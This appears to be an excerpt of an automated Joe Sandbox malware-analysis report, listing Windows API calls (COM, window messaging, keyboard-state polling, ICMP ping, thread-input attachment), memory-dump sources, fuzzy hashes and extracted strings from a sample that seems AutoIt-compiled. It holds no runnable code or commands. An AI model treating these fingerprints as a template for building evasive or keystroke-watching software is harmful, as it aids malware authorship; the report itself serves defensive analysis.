        • CoInitialize.OLE32(00000000), ref: 00257AF3
        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00257B8F
        • SHGetDesktopFolder.SHELL32(?), ref: 00257BA3
        • CoCreateInstance.OLE32(0027FD08,00000000,00000001,002A6E6C,?), ref: 00257BEF
        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00257C74
        • CoTaskMemFree.OLE32(?,?), ref: 00257CCC
        • SHBrowseForFolderW.SHELL32(?), ref: 00257D57
        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00257D7A
        • CoTaskMemFree.OLE32(00000000), ref: 00257D81
        • CoTaskMemFree.OLE32(00000000), ref: 00257DD6
        • CoUninitialize.OLE32 ref: 00257DDC
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
        • String ID:
        • API String ID: 2762341140-0
        • Opcode ID: be6b83bb2afab580667c1658b9968302f8712dc2b77c41c2f55be924bef5645f
        • Instruction ID: e05ce6da79d2b6a352ef3e04b0a5eea67fd7b06b17cfbacf2c38f06aec23468e
        • Opcode Fuzzy Hash: be6b83bb2afab580667c1658b9968302f8712dc2b77c41c2f55be924bef5645f
        • Instruction Fuzzy Hash: EFC14C75A14109AFCB14DFA4D888DAEBBF9FF48305B148499E81ADB361D730ED45CB90
        APIs
        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00275504
        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00275515
        • CharNextW.USER32(00000158), ref: 00275544
        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00275585
        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0027559B
        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002755AC
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend$CharNext
        • String ID:
        • API String ID: 1350042424-0
        • Opcode ID: 6040cbde07ab70a658c578c11d62ff0843d950c87f2d9879a1744c68ac459686
        • Instruction ID: 095240bf76f90fde06d6ff7762eecb2a6ad8b40cca443c501a19564dd6d540ba
        • Opcode Fuzzy Hash: 6040cbde07ab70a658c578c11d62ff0843d950c87f2d9879a1744c68ac459686
        • Instruction Fuzzy Hash: 2761B430920629EFDF108F60DC859FFBB79FF05760F508149F619A6290D7B49AA0DB60
        APIs
        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0023FAAF
        • SafeArrayAllocData.OLEAUT32(?), ref: 0023FB08
        • VariantInit.OLEAUT32(?), ref: 0023FB1A
        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0023FB3A
        • VariantCopy.OLEAUT32(?,?), ref: 0023FB8D
        • SafeArrayUnaccessData.OLEAUT32(?), ref: 0023FBA1
        • VariantClear.OLEAUT32(?), ref: 0023FBB6
        • SafeArrayDestroyData.OLEAUT32(?), ref: 0023FBC3
        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0023FBCC
        • VariantClear.OLEAUT32(?), ref: 0023FBDE
        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0023FBE9
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
        • String ID:
        • API String ID: 2706829360-0
        • Opcode ID: de8e0db11960257adbd816a8d45f2298f7bb009021f09f116babd1250e380130
        • Instruction ID: 4a0ad46e7643d8ed3553f34748c23f08dafabc1e1f28a2f8cb46891382b0d118
        • Opcode Fuzzy Hash: de8e0db11960257adbd816a8d45f2298f7bb009021f09f116babd1250e380130
        • Instruction Fuzzy Hash: 164162B5E102199FCB00DF64EC689AEBBB9FF18344F108069E955A7261D730A955CF90
        APIs
        • GetKeyboardState.USER32(?), ref: 00249CA1
        • GetAsyncKeyState.USER32(000000A0), ref: 00249D22
        • GetKeyState.USER32(000000A0), ref: 00249D3D
        • GetAsyncKeyState.USER32(000000A1), ref: 00249D57
        • GetKeyState.USER32(000000A1), ref: 00249D6C
        • GetAsyncKeyState.USER32(00000011), ref: 00249D84
        • GetKeyState.USER32(00000011), ref: 00249D96
        • GetAsyncKeyState.USER32(00000012), ref: 00249DAE
        • GetKeyState.USER32(00000012), ref: 00249DC0
        • GetAsyncKeyState.USER32(0000005B), ref: 00249DD8
        • GetKeyState.USER32(0000005B), ref: 00249DEA
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: State$Async$Keyboard
        • String ID:
        • API String ID: 541375521-0
        • Opcode ID: f376d463465aab13342d0297aa8e54cc4d3041f6afca04ed9c6acc2cdb95b92b
        • Instruction ID: 54c653b469bfbe80367b59f0a585d2c4a68ef34319dd4862ddabfd8bf256b25b
        • Opcode Fuzzy Hash: f376d463465aab13342d0297aa8e54cc4d3041f6afca04ed9c6acc2cdb95b92b
        • Instruction Fuzzy Hash: 3A41E830A147CB6DFF389F74C8443B7BEA0AB16304F44805ECAC6561C2D7A599E4CB92
        APIs
        • WSAStartup.WSOCK32(00000101,?), ref: 002605BC
        • inet_addr.WSOCK32(?), ref: 0026061C
        • gethostbyname.WSOCK32(?), ref: 00260628
        • IcmpCreateFile.IPHLPAPI ref: 00260636
        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002606C6
        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002606E5
        • IcmpCloseHandle.IPHLPAPI(?), ref: 002607B9
        • WSACleanup.WSOCK32 ref: 002607BF
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
        • String ID: Ping
        • API String ID: 1028309954-2246546115
        • Opcode ID: 1a5e1d42fede76067564e3e6326ac52890e08489fbb64f426b396bdbc04ab2bb
        • Instruction ID: b5713db49bc8f0486bb1e2fac8b6b50329a3f9fe1aa5be2374e72e69e930bf1a
        • Opcode Fuzzy Hash: 1a5e1d42fede76067564e3e6326ac52890e08489fbb64f426b396bdbc04ab2bb
        • Instruction Fuzzy Hash: C6919E356142429FD321CF25D8C8F1BBBE4AF44318F1485A9F46A8B6A2C770ED91DF91
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _wcslen$BuffCharLower
        • String ID: cdecl$none$stdcall$winapi
        • API String ID: 707087890-567219261
        • Opcode ID: 92175172fe2f0033ffad2ed6bb6bd7d3ae3744387879e5bb47edd7afb7369d36
        • Instruction ID: 8fc83b6135982bfb9c971d7122a8dce29f468629be6b6d230a21b5903ed03d7c
        • Opcode Fuzzy Hash: 92175172fe2f0033ffad2ed6bb6bd7d3ae3744387879e5bb47edd7afb7369d36
        • Instruction Fuzzy Hash: B751BF31A205179BCB24DF68C8509BEB3A5BF65724B604329F926E72C4EB31DDA0C790
        APIs
        • CoInitialize.OLE32 ref: 00263774
        • CoUninitialize.OLE32 ref: 0026377F
        • CoCreateInstance.OLE32(?,00000000,00000017,0027FB78,?), ref: 002637D9
        • IIDFromString.OLE32(?,?), ref: 0026384C
        • VariantInit.OLEAUT32(?), ref: 002638E4
        • VariantClear.OLEAUT32(?), ref: 00263936
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
        • API String ID: 636576611-1287834457
        • Opcode ID: 96fd24e2baeae62c07f1a44cb515fc36dd4819d7924cdf0ee47537b6c82daf44
        • Instruction ID: 16ed3241b1f02f6109fe143d14a9fe1501b76402989d1be31402a3a3b5193359
        • Opcode Fuzzy Hash: 96fd24e2baeae62c07f1a44cb515fc36dd4819d7924cdf0ee47537b6c82daf44
        • Instruction Fuzzy Hash: FF61B370628701AFD311DF64D889FAAB7E4EF49710F10081DF9859B291D770EE98CB92
        APIs
          • Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2
          • Part of subcall function 001F912D: GetCursorPos.USER32(?), ref: 001F9141
          • Part of subcall function 001F912D: ScreenToClient.USER32(00000000,?), ref: 001F915E
          • Part of subcall function 001F912D: GetAsyncKeyState.USER32(00000001), ref: 001F9183
          • Part of subcall function 001F912D: GetAsyncKeyState.USER32(00000002), ref: 001F919D
        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00278B6B
        • ImageList_EndDrag.COMCTL32 ref: 00278B71
        • ReleaseCapture.USER32 ref: 00278B77
        • SetWindowTextW.USER32(?,00000000), ref: 00278C12
        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00278C25
        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00278CFF
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
        • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#+
        • API String ID: 1924731296-3493582189
        • Opcode ID: 6ffa95c9092bae54b3996f81882fad7725936e0f86e5ca1bea58c39b26bad142
        • Instruction ID: 8c7ebb2b2d6bb1452adb733e481a6f1d39da4afb39041dcecc2af333b41d947a
        • Opcode Fuzzy Hash: 6ffa95c9092bae54b3996f81882fad7725936e0f86e5ca1bea58c39b26bad142
        • Instruction Fuzzy Hash: 27519C71104344AFD704EF24DC9AFAE77E4FB88714F50062DF99A972A1CB709964CBA2
        APIs
        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002533CF
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002533F0
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: LoadString$_wcslen
        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
        • API String ID: 4099089115-3080491070
        • Opcode ID: 70a06677de0c6d99f26213e153f8a1e53c76ecda036c19ea329330c6b704efa6
        • Instruction ID: 9e6e3a6c15ace70b6790f6c2b65f64d9f68bc1d78fcd21206573378f62708761
        • Opcode Fuzzy Hash: 70a06677de0c6d99f26213e153f8a1e53c76ecda036c19ea329330c6b704efa6
        • Instruction Fuzzy Hash: 7051C231910649ABDF19EBE1DD46EEEB7B8AF25340F644165F40572062EB312FA8CF60
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _wcslen$BuffCharUpper
        • String ID: APPEND$EXISTS$KEYS$REMOVE
        • API String ID: 1256254125-769500911
        • Opcode ID: 1b3e652089e1b82b28a2b653a55b16d5b9ddc1c6291df7a777213217507e0c7c
        • Instruction ID: 84f8a7fdbfc2e22c5c6501e5d36834a15dd14d089df402fda04b14483277b9f6
        • Opcode Fuzzy Hash: 1b3e652089e1b82b28a2b653a55b16d5b9ddc1c6291df7a777213217507e0c7c
        • Instruction Fuzzy Hash: A3412B32A201279BCB156F7DCC905BEB7A9EFA1754B264129E821DB284E731CDA1C790
        APIs
        • SetErrorMode.KERNEL32(00000001), ref: 002553A0
        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00255416
        • GetLastError.KERNEL32 ref: 00255420
        • SetErrorMode.KERNEL32(00000000,READY), ref: 002554A7
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Error$Mode$DiskFreeLastSpace
        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
        • API String ID: 4194297153-14809454
        • Opcode ID: 42c47edf6cc3d41b7f54688337962c2f3b3c9cd3607c63905453dfa8dfab6cbd
        • Instruction ID: 4387dfa62d412d7753c492ff4b8f239fcfa50ffa211d2186eee5a52535efebc8
        • Opcode Fuzzy Hash: 42c47edf6cc3d41b7f54688337962c2f3b3c9cd3607c63905453dfa8dfab6cbd
        • Instruction Fuzzy Hash: 4531F235A106159FD710DF68C498EAEBBF4FF05306F188069E805CB292DB70ED9ACB90
        APIs
        • CreateMenu.USER32 ref: 00273C79
        • SetMenu.USER32(?,00000000), ref: 00273C88
        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00273D10
        • IsMenu.USER32(?), ref: 00273D24
        • CreatePopupMenu.USER32 ref: 00273D2E
        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00273D5B
        • DrawMenuBar.USER32 ref: 00273D63
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Menu$CreateItem$DrawInfoInsertPopup
        • String ID: 0$F
        • API String ID: 161812096-3044882817
        • Opcode ID: b5693ade1d5e881bf54cc889c8add979ca69b6caf2c667e290309053f8ab471b
        • Instruction ID: 04e69e1b2fe74d11ca1fe5ab3f4f02ac20ac30522aee74d99f4ac1277ad1f1df
        • Opcode Fuzzy Hash: b5693ade1d5e881bf54cc889c8add979ca69b6caf2c667e290309053f8ab471b
        • Instruction Fuzzy Hash: C0419E74A1120AEFDB24CF64E848ADA77B5FF49300F14402DF94AA7360D771AA20DF90
        APIs
        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00273A9D
        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00273AA0
        • GetWindowLongW.USER32(?,000000F0), ref: 00273AC7
        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00273AEA
        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00273B62
        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00273BAC
        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00273BC7
        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00273BE2
        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00273BF6
        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00273C13
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend$LongWindow
        • String ID:
        • API String ID: 312131281-0
        • Opcode ID: 919503dc5734a1c2fe732a2be9636a09994b286a6dfcaddbeaefb51e73e94a7c
        • Instruction ID: 87e5524caf5a9ddef75967e8ff421de8b5cf7724667f54e48696101219d686de
        • Opcode Fuzzy Hash: 919503dc5734a1c2fe732a2be9636a09994b286a6dfcaddbeaefb51e73e94a7c
        • Instruction Fuzzy Hash: 3B618B75910248AFDB11DFA8CC85EEE77B8EB09704F10419AFA19E72A1C770AE61DF50
        APIs
        • GetCurrentThreadId.KERNEL32 ref: 0024B151
        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0024A1E1,?,00000001), ref: 0024B165
        • GetWindowThreadProcessId.USER32(00000000), ref: 0024B16C
        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0024A1E1,?,00000001), ref: 0024B17B
        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0024B18D
        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0024A1E1,?,00000001), ref: 0024B1A6
        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0024A1E1,?,00000001), ref: 0024B1B8
        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0024A1E1,?,00000001), ref: 0024B1FD
        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0024A1E1,?,00000001), ref: 0024B212
        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0024A1E1,?,00000001), ref: 0024B21D
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
        • String ID:
        • API String ID: 2156557900-0
        • Opcode ID: ddbb134dd2cc00fb204ebc90c2553de5f4a84b9dd453fd9a12494ff08d585f73
        • Instruction ID: 34903da49a9a16e21662fb7eb2d75878e7e45e1282b08472b893df5375aad492
        • Opcode Fuzzy Hash: ddbb134dd2cc00fb204ebc90c2553de5f4a84b9dd453fd9a12494ff08d585f73
        • Instruction Fuzzy Hash: 1C319C75560209BFDB16EF24EC8CB6D7BADBF51311F204519FA09D6190D7B4DA808F60
        APIs
        • _free.LIBCMT ref: 00212C94
          • Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?), ref: 002129DE
          • Part of subcall function 002129C8: GetLastError.KERNEL32(?,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?,?), ref: 002129F0
        • _free.LIBCMT ref: 00212CA0
        • _free.LIBCMT ref: 00212CAB
        • _free.LIBCMT ref: 00212CB6
        • _free.LIBCMT ref: 00212CC1
        • _free.LIBCMT ref: 00212CCC
        • _free.LIBCMT ref: 00212CD7
        • _free.LIBCMT ref: 00212CE2
        • _free.LIBCMT ref: 00212CED
        • _free.LIBCMT ref: 00212CFB
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _free$ErrorFreeHeapLast
        • String ID:
        • API String ID: 776569668-0
        • Opcode ID: 1f3a7c3a312f9b48a339e20ad5fe62e2b7ab19a37bf653b2c23c040604eef8f4
        • Instruction ID: a9b284510db150c21b103f38257ef737fd9d19caf18c4ce0d3c2de7e64003aa3
        • Opcode Fuzzy Hash: 1f3a7c3a312f9b48a339e20ad5fe62e2b7ab19a37bf653b2c23c040604eef8f4
        • Instruction Fuzzy Hash: 6B119676120108EFCB02EF58D842DDD3BA5FF15360F5154A5FA485F222D631EAB49F90
        APIs
        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001E1459
        • OleUninitialize.OLE32(?,00000000), ref: 001E14F8
        • UnregisterHotKey.USER32(?), ref: 001E16DD
        • DestroyWindow.USER32(?), ref: 002224B9
        • FreeLibrary.KERNEL32(?), ref: 0022251E
        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0022254B
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
        • String ID: close all
